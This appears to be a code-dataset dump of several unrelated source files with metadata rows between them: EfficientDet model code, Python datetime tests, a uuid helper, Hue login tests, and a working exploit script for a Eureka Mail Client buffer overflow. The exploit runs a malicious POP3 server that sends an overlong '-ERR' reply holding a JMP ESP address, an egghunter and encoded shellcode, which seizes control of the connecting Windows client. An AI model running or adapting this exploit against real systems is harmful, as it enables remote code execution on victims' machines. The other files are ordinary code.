P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P4_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/conv2d')(P4_in)
P4_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
# P4_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode4/resample_0_1_9/bn')(P4_in_2)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in_2, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P5_in_2 = layers.Conv2D(num_channels, kernel_size=1, padding='same',
name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/conv2d')(P5_in)
P5_in_2 = layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON,
name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
# P5_in_2 = BatchNormalization(freeze=freeze_bn, name=f'fpn_cells/cell_{id}/fnode5/resample_0_2_10/bn')(P5_in_2)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in_2, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
else:
P3_in, P4_in, P5_in, P6_in, P7_in = features
P7_U = layers.UpSampling2D()(P7_in)
P6_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode0/add')([P6_in, P7_U])
P6_td = layers.Activation(lambda x: tf.nn.swish(x))(P6_td)
P6_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode0/op_after_combine5')(P6_td)
P6_U = layers.UpSampling2D()(P6_td)
P5_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode1/add')([P5_in, P6_U])
P5_td = layers.Activation(lambda x: tf.nn.swish(x))(P5_td)
P5_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode1/op_after_combine6')(P5_td)
P5_U = layers.UpSampling2D()(P5_td)
P4_td = layers.Add(name=f'fpn_cells/cell_{id}/fnode2/add')([P4_in, P5_U])
P4_td = layers.Activation(lambda x: tf.nn.swish(x))(P4_td)
P4_td = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode2/op_after_combine7')(P4_td)
P4_U = layers.UpSampling2D()(P4_td)
P3_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode3/add')([P3_in, P4_U])
P3_out = layers.Activation(lambda x: tf.nn.swish(x))(P3_out)
P3_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode3/op_after_combine8')(P3_out)
P3_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P3_out)
P4_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode4/add')([P4_in, P4_td, P3_D])
P4_out = layers.Activation(lambda x: tf.nn.swish(x))(P4_out)
P4_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode4/op_after_combine9')(P4_out)
P4_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P4_out)
P5_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode5/add')([P5_in, P5_td, P4_D])
P5_out = layers.Activation(lambda x: tf.nn.swish(x))(P5_out)
P5_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode5/op_after_combine10')(P5_out)
P5_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P5_out)
P6_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode6/add')([P6_in, P6_td, P5_D])
P6_out = layers.Activation(lambda x: tf.nn.swish(x))(P6_out)
P6_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode6/op_after_combine11')(P6_out)
P6_D = layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(P6_out)
P7_out = layers.Add(name=f'fpn_cells/cell_{id}/fnode7/add')([P7_in, P6_D])
P7_out = layers.Activation(lambda x: tf.nn.swish(x))(P7_out)
P7_out = SeparableConvBlock(num_channels=num_channels, kernel_size=3, strides=1,
name=f'fpn_cells/cell_{id}/fnode7/op_after_combine12')(P7_out)
return P3_out, P4_td, P5_td, P6_td, P7_out
class BoxNet(models.Model):
def __init__(self, width, depth, num_anchors=9, separable_conv=True, freeze_bn=False, **kwargs):
super(BoxNet, self).__init__(**kwargs)
self.width = width
self.depth = depth
self.num_anchors = num_anchors
self.separable_conv = separable_conv
options = {
'kernel_size': 3,
'strides': 1,
'padding': 'same',
'bias_initializer': 'zeros',
}
if separable_conv:
kernel_initializer = {
'depthwise_initializer': initializers.VarianceScaling(),
'pointwise_initializer': initializers.VarianceScaling(),
}
options.update(kernel_initializer)
self.convs = [layers.SeparableConv2D(filters=width, name=f'{self.name}/box-{i}', **options) for i in
range(depth)]
self.head = layers.SeparableConv2D(filters=num_anchors * 4, name=f'{self.name}/box-predict', **options)
else:
kernel_initializer = {
'kernel_initializer': initializers.RandomNormal(mean=0.0, stddev=0.01, seed=None)
}
options.update(kernel_initializer)
self.convs = [layers.Conv2D(filters=width, name=f'{self.name}/box-{i}', **options) for i in range(depth)]
self.head = layers.Conv2D(filters=num_anchors * 4, name=f'{self.name}/box-predict', **options)
self.bns = [
[layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{self.name}/box-{i}-bn-{j}') for j in
range(3, 8)]
for i in range(depth)]
# self.bns = [[BatchNormalization(freeze=freeze_bn, name=f'{self.name}/box-{i}-bn-{j}') for j in range(3, 8)]
# for i in range(depth)]
self.relu = layers.Lambda(lambda x: tf.nn.swish(x))
self.reshape = layers.Reshape((-1, 4))
self.level = 0
def call(self, inputs, **kwargs):
feature, level = inputs
for i in range(self.depth):
feature = self.convs[i](feature)
feature = self.bns[i][self.level](feature)
feature = self.relu(feature)
outputs = self.head(feature)
outputs = self.reshape(outputs)
self.level += 1
return outputs
class ClassNet(models.Model):
def __init__(self, width, depth, num_classes=20, num_anchors=9, separable_conv=True, freeze_bn=False, **kwargs):
super(ClassNet, self).__init__(**kwargs)
self.width = width
self.depth = depth
self.num_classes = num_classes
self.num_anchors = num_anchors
self.separable_conv = separable_conv
options = {
'kernel_size': 3,
'strides': 1,
'padding': 'same',
}
if self.separable_conv:
kernel_initializer = {
'depthwise_initializer': initializers.VarianceScaling(),
'pointwise_initializer': initializers.VarianceScaling(),
}
options.update(kernel_initializer)
self.convs = [layers.SeparableConv2D(filters=width, bias_initializer='zeros', name=f'{self.name}/class-{i}',
**options)
for i in range(depth)]
self.head = layers.SeparableConv2D(filters=num_classes * num_anchors,
bias_initializer=PriorProbability(probability=0.01),
name=f'{self.name}/class-predict', **options)
else:
kernel_initializer = {
'kernel_initializer': initializers.RandomNormal(mean=0.0, stddev=0.01, seed=None)
}
options.update(kernel_initializer)
self.convs = [layers.Conv2D(filters=width, bias_initializer='zeros', name=f'{self.name}/class-{i}',
**options)
for i in range(depth)]
self.head = layers.Conv2D(filters=num_classes * num_anchors,
bias_initializer=PriorProbability(probability=0.01),
name='class-predict', **options)
self.bns = [
[layers.BatchNormalization(momentum=MOMENTUM, epsilon=EPSILON, name=f'{self.name}/class-{i}-bn-{j}') for j
in range(3, 8)]
for i in range(depth)]
# self.bns = [[BatchNormalization(freeze=freeze_bn, name=f'{self.name}/class-{i}-bn-{j}') for j in range(3, 8)]
# for i in range(depth)]
self.relu = layers.Lambda(lambda x: tf.nn.swish(x))
self.reshape = layers.Reshape((-1, num_classes))
self.activation = layers.Activation('sigmoid')
self.level = 0
def call(self, inputs, **kwargs):
feature, level = inputs
for i in range(self.depth):
feature = self.convs[i](feature)
feature = self.bns[i][self.level](feature)
feature = self.relu(feature)
outputs = self.head(feature)
outputs = self.reshape(outputs)
outputs = self.activation(outputs)
self.level += 1
return outputs
def efficientdet(phi, num_classes=20, num_anchors=9, weighted_bifpn=False, freeze_bn=False,
score_threshold=0.01, detect_quadrangle=False, anchor_parameters=None, separable_conv=True):
assert phi in range(7)
input_size = image_sizes[phi]
input_shape = (input_size, input_size, 3)
image_input = layers.Input(input_shape)
w_bifpn = w_bifpns[phi]
d_bifpn = d_bifpns[phi]
w_head = w_bifpn
d_head = d_heads[phi]
backbone_cls = backbones[phi]
features = backbone_cls(input_tensor=image_input, freeze_bn=freeze_bn)
if weighted_bifpn:
fpn_features = features
for i in range(d_bifpn):
fpn_features = build_wBiFPN(fpn_features, w_bifpn, i, freeze_bn=freeze_bn)
else:
fpn_features = features
for i in range(d_bifpn):
fpn_features = build_BiFPN(fpn_features, w_bifpn, i, freeze_bn=freeze_bn)
box_net = BoxNet(w_head, d_head, num_anchors=num_anchors, separable_conv=separable_conv, freeze_bn=freeze_bn,
name='box_net')
class_net = ClassNet(w_head, d_head, num_classes=num_classes, num_anchors=num_anchors,
separable_conv=separable_conv, freeze_bn=freeze_bn, name='class_net')
classification = [class_net([feature, i]) for i, feature in enumerate(fpn_features)]
classification = layers.Concatenate(axis=1, name='classification')(classification)
regression = [box_net([feature, i]) for i, feature in enumerate(fpn_features)]
regression = layers.Concatenate(axis=1, name='regression')(regression)
model = models.Model(inputs=[image_input], outputs=[classification, regression], name='efficientdet')
# apply predicted regression to anchors
anchors = anchors_for_shape((input_size, input_size), anchor_params=anchor_parameters)
anchors_input = np.expand_dims(anchors, axis=0)
boxes = RegressBoxes(name='boxes')([anchors_input, regression[..., :4]])
boxes = ClipBoxes(name='clipped_boxes')([image_input, boxes])
# filter detections (apply NMS / score threshold / select top-k)
if detect_quadrangle:
detections = FilterDetections(
name='filtered_detections',
score_threshold=score_threshold,
detect_quadrangle=True
)([boxes, classification, regression[..., 4:8], regression[..., 8]])
else:
detections = FilterDetections(
name='filtered_detections',
score_threshold=score_threshold
)([boxes, classification])
prediction_model = models.Model(inputs=[image_input], outputs=detections, name='efficientdet_p')
return model, prediction_model
| 62.897436 | 120 | 0.640406 | 4,143 | 29,436 | 4.271301 | 0.055033 | 0.030515 | 0.042495 | 0.069055 | 0.890314 | 0.869462 | 0.858782 | 0.85347 | 0.842846 | 0.829849 | 0 | 0.048517 | 0.230466 | 29,436 | 467 | 121 | 63.03212 | 0.732695 | 0.071477 | 0 | 0.704715 | 0 | 0 | 0.152919 | 0.13021 | 0 | 0 | 0 | 0 | 0.002481 | 1 | 0.022333 | false | 0 | 0.027295 | 0 | 0.07196 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a430353fe40e38f9545035e151af37bc4b0d584 | 7,613 | py | Python | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | null | null | null | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | 1 | 2019-09-24T08:06:49.000Z | 2019-09-24T08:06:49.000Z | tests/stdlib/test_datetime.py | egoelm/voc | 9e6c545ac9d7825230d397dfff96da81cd089faf | [
"BSD-3-Clause"
] | null | null | null | from unittest import expectedFailure
from ..utils import TranspileTestCase
# class DateTimeModuleTests(TranspileTestCase):
# class TimeDeltaTests(TranspileTestCase):
# class DateTimeTests(TranspileTestCase):
# def test_creation(self):
# self.assertCodeExecution("""
# from datetime import datetime
# print(datetime(1993,5,17).min)
# print(datetime(1993,5,17).max)
# print (datetime(1993,5,17).year)
# print (datetime(1993,5,17).month)
# print (datetime(1993,5,17,20,30,12,34).hour)
# print (datetime(1993,5,17,20,30,12,34).minute)
# print (datetime(1993,5,17,20,30,12,34).second)
# print (datetime(1993,5,17,20,30,12,34).microsecond)
# """)
class DateTests(TranspileTestCase):
    """Transpile tests for ``datetime.date``: construction, argument
    validation, class/instance methods and class attributes.

    Fix: the original version defined ``test_two_many_args``,
    ``test_two_few_args``, ``test_one_arg_no_month`` and
    ``test_one_arg_w_day`` twice each.  In Python a later ``def`` with the
    same name silently replaces the earlier one, so the first copies were
    dead code and never ran.  Each test is now defined exactly once.
    (``test_two_few_args_no_yr``/``test_two_few_args_no_month`` duplicate
    the bodies of ``test_two_few_args2``/``test_two_few_args3`` but have
    distinct names, so they are kept for backward compatibility.)
    """

    def test_creation(self):
        """date() accepts year/month/day positionally or as keywords."""
        self.assertCodeExecution("""
            from datetime import date
            print(date(14, 10, day=11))
            print(date(14, 10, 11))
            print(date(14, month=10, day=11))
            print(date(year=14, month=10, day=11))
            print(date(1,1,1))
            """)

    def test_year_too_large(self):
        """A year above date.max.year raises ValueError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14444, 10, 11)
            except ValueError as err:
                print(err)
            """)

    def test_month_too_large(self):
        """A month outside 1..12 raises ValueError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 122, 11)
            except ValueError as err:
                print(err)
            """)

    def test_day_too_large(self):
        """A day outside the month's range raises ValueError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 12, 111)
            except ValueError as err:
                print(err)
            """)

    def test_year_wrong_type(self):
        """A float year raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14.0, 12, 11)
            except TypeError as err:
                print(err)
            """)

    def test_month_wrong_type(self):
        """A float month raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 12.0, 11)
            except TypeError as err:
                print(err)
            """)

    def test_day_wrong_type(self):
        """A float day raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 12, 11.0)
            except TypeError as err:
                print(err)
            """)

    def test_two_many_args(self):
        """A fourth positional argument raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 12, 10, 1)
            except TypeError as err:
                print(err)
            """)

    def test_two_few_args(self):
        """Omitting the day raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(14, 12)
            except TypeError as err:
                print(err)
            """)

    def test_two_few_args2(self):
        """Keyword month/day without a year raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(month=14, day=12)
            except TypeError as err:
                print(err)
            """)

    def test_two_few_args3(self):
        """Keyword year/day without a month raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(year=14, day=12)
            except TypeError as err:
                print(err)
            """)

    def test_one_arg_no_month(self):
        """A lone keyword year raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(year=14)
            except TypeError as err:
                print(err)
            """)

    def test_two_few_args_no_yr(self):
        """Same check as test_two_few_args2, kept under its legacy name."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(month=14, day=12)
            except TypeError as err:
                print(err)
            """)

    def test_two_few_args_no_month(self):
        """Same check as test_two_few_args3, kept under its legacy name."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(year=14, day=12)
            except TypeError as err:
                print(err)
            """)

    def test_one_arg_year_float(self):
        """A lone float year raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(year=14.0)
            except TypeError as err:
                print(err)
            """)

    def test_one_arg_w_month(self):
        """A lone float month raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(month=14.0)
            except TypeError as err:
                print(err)
            """)

    def test_one_arg_w_day(self):
        """A lone day keyword raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date(day=71)
            except TypeError as err:
                print(err)
            """)

    def test_no_arg(self):
        """Calling date() with no arguments raises TypeError."""
        self.assertCodeExecution("""
            from datetime import date
            try:
                date()
            except TypeError as err:
                print(err)
            """)

    def test_class_methods(self):
        """date.today() returns the current date.

        NOTE(review): compares output of two interpreter runs, so this can
        flake if the runs straddle midnight.
        """
        self.assertCodeExecution("""
            from datetime import date
            print(date.today())
            """)

    def test_instance_methods(self):
        """weekday() is consistent across months of 2019."""
        self.assertCodeExecution("""
            from datetime import date
            for d in range(1,13):
                x = date(2019,d,d)
                print(x.weekday())
            """)

    def test_ctime(self):
        """ctime() formats a fixed date (loop kept from original)."""
        self.assertCodeExecution("""
            from datetime import date
            for d in range(1,13):
                x = date(1993,12,1)
                print(x.ctime())
            """)

    def test_class_attributes(self):
        """date.min and date.max are accessible on instances."""
        self.assertCodeExecution("""
            from datetime import date
            x = date(2019,9,22)
            print(x.min)
            """)
        self.assertCodeExecution("""
            from datetime import date
            x = date(2019,9,22)
            print(x.max)
            """)
| 25.376667 | 65 | 0.485485 | 752 | 7,613 | 4.784574 | 0.111702 | 0.185381 | 0.217621 | 0.282101 | 0.841301 | 0.814619 | 0.814619 | 0.797387 | 0.7607 | 0.618955 | 0 | 0.053935 | 0.405753 | 7,613 | 299 | 66 | 25.461538 | 0.741379 | 0.118482 | 0 | 0.8 | 0 | 0 | 0.653735 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 1 | 0.12381 | false | 0 | 0.138095 | 0 | 0.266667 | 0.147619 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8a7cd3f44ff2ca98d43a7e03e6b47774b79e986f | 3,541 | py | Python | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | eureka_email_client/eureka_mail_egghunter.py | m1kemu/ExploitDev | 4a51a6bc83577c619a626fe037a885e007ef3f31 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Author: Michael Music
# Date: 6/24/2019
# Description: Eureka Mail Client ERR Buffer Overflow Exploit
# Exercise in egghunting
# Tested on Windows XP
# Notes:
import socket
# EIP at offset 710
# ESP at offset 714
# EDI at offset 2997
# ESP has around 200 bytes of space
# EDI has 1000+ bytes of space
# CALL EDI located at 0x7e41c891 in user32.dll
# JMP ESP located at 0x7e429353
ip = '192.168.1.100'
junk = 'A' * 710
eip = '\x53\x93\x42\x7e'
egghunter_nop_sled = '\x90' * 8
egghunter = '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8' + '\x77\x30\x30\x74' + '\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
padding = '\x90' * 1000
tag = 'w00tw00t'
shellcode = ""
shellcode += "\xdb\xdd\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x43"
shellcode += "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30"
shellcode += "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30"
shellcode += "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += "\x49\x4b\x4c\x4d\x38\x4d\x52\x35\x50\x55\x50\x35\x50"
shellcode += "\x55\x30\x4c\x49\x4b\x55\x36\x51\x49\x50\x45\x34\x4c"
shellcode += "\x4b\x30\x50\x56\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b"
shellcode += "\x30\x52\x55\x44\x4c\x4b\x33\x42\x36\x48\x44\x4f\x48"
shellcode += "\x37\x31\x5a\x51\x36\x30\x31\x4b\x4f\x4e\x4c\x37\x4c"
shellcode += "\x35\x31\x53\x4c\x45\x52\x46\x4c\x51\x30\x4f\x31\x58"
shellcode += "\x4f\x54\x4d\x53\x31\x4f\x37\x4d\x32\x4b\x42\x46\x32"
shellcode += "\x50\x57\x4c\x4b\x50\x52\x54\x50\x4c\x4b\x31\x5a\x57"
shellcode += "\x4c\x4c\x4b\x50\x4c\x34\x51\x42\x58\x4d\x33\x51\x58"
shellcode += "\x45\x51\x38\x51\x50\x51\x4c\x4b\x56\x39\x57\x50\x33"
shellcode += "\x31\x59\x43\x4c\x4b\x47\x39\x54\x58\x4b\x53\x57\x4a"
shellcode += "\x51\x59\x4c\x4b\x30\x34\x4c\x4b\x45\x51\x59\x46\x46"
shellcode += "\x51\x4b\x4f\x4e\x4c\x39\x51\x38\x4f\x44\x4d\x53\x31"
shellcode += "\x48\x47\x46\x58\x4d\x30\x53\x45\x4c\x36\x35\x53\x33"
shellcode += "\x4d\x4b\x48\x47\x4b\x43\x4d\x37\x54\x53\x45\x4d\x34"
shellcode += "\x50\x58\x4c\x4b\x36\x38\x51\x34\x43\x31\x48\x53\x45"
shellcode += "\x36\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x30\x58\x55\x4c"
shellcode += "\x33\x31\x4e\x33\x4c\x4b\x33\x34\x4c\x4b\x35\x51\x38"
shellcode += "\x50\x4d\x59\x50\x44\x56\x44\x47\x54\x31\x4b\x51\x4b"
shellcode += "\x45\x31\x46\x39\x30\x5a\x56\x31\x4b\x4f\x4d\x30\x51"
shellcode += "\x4f\x51\x4f\x50\x5a\x4c\x4b\x45\x42\x5a\x4b\x4c\x4d"
shellcode += "\x51\x4d\x42\x4a\x33\x31\x4c\x4d\x4c\x45\x58\x32\x45"
shellcode += "\x50\x45\x50\x43\x30\x36\x30\x55\x38\x30\x31\x4c\x4b"
shellcode += "\x42\x4f\x4d\x57\x4b\x4f\x48\x55\x4f\x4b\x4a\x50\x38"
shellcode += "\x35\x49\x32\x36\x36\x53\x58\x4f\x56\x4c\x55\x4f\x4d"
shellcode += "\x4d\x4d\x4b\x4f\x48\x55\x37\x4c\x35\x56\x43\x4c\x44"
shellcode += "\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x33\x35\x4f\x4b"
shellcode += "\x30\x47\x45\x43\x33\x42\x52\x4f\x52\x4a\x35\x50\x51"
shellcode += "\x43\x4b\x4f\x39\x45\x45\x33\x43\x51\x32\x4c\x33\x53"
shellcode += "\x56\x4e\x32\x45\x32\x58\x43\x55\x53\x30\x41\x41"
buf = '-ERR ' + junk + eip + egghunter_nop_sled + egghunter + padding + tag + shellcode
buf += 'D' * (5000 - (len(buf) - 4))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip,110))
s.listen(10)
print '[+] Waiting for connection...'
client_socket, client_address = s.accept()
print '[+] Accepted connection'
while True:
print '[+] Attempting to send payload'
client_socket.send(buf)
s.close()
print '[+] Connection closed'
| 41.658824 | 152 | 0.698955 | 674 | 3,541 | 3.658754 | 0.237389 | 0.041363 | 0.014599 | 0.014599 | 0.007299 | 0 | 0 | 0 | 0 | 0 | 0 | 0.274044 | 0.083875 | 3,541 | 84 | 153 | 42.154762 | 0.486128 | 0.101666 | 0 | 0 | 0 | 0.631579 | 0.662772 | 0.608778 | 0.017544 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.017544 | null | null | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8a86bc880ea8f92620bb9008cda5e0cc2a7daa1d | 93 | py | Python | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | 2 | 2017-05-24T17:01:14.000Z | 2019-05-06T11:58:33.000Z | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | null | null | null | agentserver/utils/uuid.py | silverfernsys/agentserver | 3372f7a60af7a64ab3f4e431edeb95f23b2b6be5 | [
"BSD-4-Clause"
] | null | null | null | import binascii
import os
def uuid():
    """Return a random 40-character lowercase hex token (20 random bytes)."""
    raw = os.urandom(20)
    return binascii.hexlify(raw).decode()
| 13.285714 | 52 | 0.72043 | 13 | 93 | 5.153846 | 0.769231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.150538 | 93 | 6 | 53 | 15.5 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
8a88ecfea5b461e5f2d99fb23c47ebcffe5fe39c | 36,167 | py | Python | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | desktop/core/src/desktop/auth/views_test.py | yetsun/hue | 2e48f0cc70e233ee0e1b40733d4b2a18d8836c66 | [
"Apache-2.0"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | #!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from builtins import object
import datetime
import sys
from django_auth_ldap import backend as django_auth_ldap_backend
from django.db.utils import DataError
from django.conf import settings
from django.test.client import Client
from nose.plugins.skip import SkipTest
from nose.tools import assert_true, assert_false, assert_equal, assert_raises
from hadoop.test_base import PseudoHdfsTestBase
from hadoop import pseudo_hdfs4
from useradmin import ldap_access
from useradmin.models import get_default_user_group, User, Group, get_profile
from useradmin.tests import LdapTestConnection
from useradmin.views import import_ldap_groups
from desktop import conf, middleware
from desktop.auth import backend
from desktop.auth.backend import create_user
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import add_to_group
if sys.version_info[0] > 2:
from unittest.mock import patch, Mock, MagicMock
else:
from mock import patch, Mock, MagicMock
def get_mocked_config():
    """Build an empty mocked-LDAP config: one server with no users/groups."""
    empty_server = {
        'users': {},
        'groups': {},
    }
    return {'mocked_ldap': empty_server}
class TestLoginWithHadoop(PseudoHdfsTestBase):
integration = True
reset = []
test_username = 'test_login_with_hadoop'
@classmethod
def setup_class(cls):
# Simulate first login ever
User.objects.all().delete()
PseudoHdfsTestBase.setup_class()
cls.auth_backends = settings.AUTHENTICATION_BACKENDS
settings.AUTHENTICATION_BACKENDS = ('desktop.auth.backend.AllowFirstUserDjangoBackend',)
@classmethod
def teardown_class(cls):
settings.AUTHENTICATION_BACKENDS = cls.auth_backends
def setUp(self):
self.c = Client()
self.reset.append( conf.AUTH.BACKEND.set_for_testing(['desktop.auth.backend.AllowFirstUserDjangoBackend']) )
self.reset.append(conf.LDAP.SYNC_GROUPS_ON_LOGIN.set_for_testing(False))
def tearDown(self):
